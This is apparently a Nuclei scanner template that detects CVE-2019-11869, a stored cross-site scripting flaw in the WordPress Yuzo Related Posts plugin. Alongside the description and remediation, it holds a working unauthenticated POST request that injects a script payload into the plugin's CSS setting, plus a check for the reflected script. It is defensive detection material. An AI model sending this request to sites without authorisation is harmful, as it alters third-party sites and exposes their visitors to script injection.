60 lines
2.4 KiB
YAML
60 lines
2.4 KiB
YAML
id: CVE-2019-11869
|
|
|
|
info:
|
|
name: WordPress Yuzo <5.12.94 - Cross-Site Scripting
|
|
author: ganofins
|
|
severity: medium
|
|
description: |
|
|
WordPress Yuzo Related Posts plugin before 5.12.94 is vulnerable to cross-site scripting
|
|
because it mistakenly expects that is_admin() verifies that the
|
|
request comes from an admin user (it actually only verifies that the
|
|
request is for an admin page). An unauthenticated attacker can consequently inject
|
|
a payload into the plugin settings, such as the
|
|
yuzo_related_post_css_and_style setting.
|
|
impact: |
|
|
Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
|
|
remediation: |
|
|
Update to the latest version of the Yuzo plugin (5.12.94 or higher) to mitigate this vulnerability.
|
|
reference:
|
|
- https://www.wordfence.com/blog/2019/04/yuzo-related-posts-zero-day-vulnerability-exploited-in-the-wild
|
|
- https://wpscan.com/vulnerability/9254
|
|
- https://www.wordfence.com/blog/2019/04/yuzo-related-posts-zero-day-vulnerability-exploited-in-the-wild/
|
|
- https://wpvulndb.com/vulnerabilities/9254
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2019-11869
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2019-11869
|
|
cwe-id: CWE-79
|
|
epss-score: 0.00291
|
|
epss-percentile: 0.65616
|
|
cpe: cpe:2.3:a:yuzopro:yuzo:5.12.94:*:*:*:*:wordpress:*:*
|
|
metadata:
|
|
max-request: 2
|
|
vendor: yuzopro
|
|
product: yuzo
|
|
framework: wordpress
|
|
tags: wpscan,cve,cve2019,wordpress,wp-plugin,xss,yuzopro
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /wp-admin/options-general.php?page=yuzo-related-post HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
yuzo_related_post_css_and_style=</style><script>alert(0);</script>
|
|
- |
|
|
GET / HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- 'contains(body_2, "<script>alert(0);</script>")'
|
|
|
|
- type: dsl
|
|
dsl:
|
|
- "contains(tolower(header_2), 'text/html')"
|
|
# digest: 4a0a00473045022010577c9f3b6fb59d7f8b9d77c9d9aabba0d301a943e1750c3dbfe29bd71cf6c6022100c9885b608a0d2fb07affa5a859f5acb8c1b78c31434974124e7c14f916ae12c1:922c64590222798bb761d5b6d8e72950 |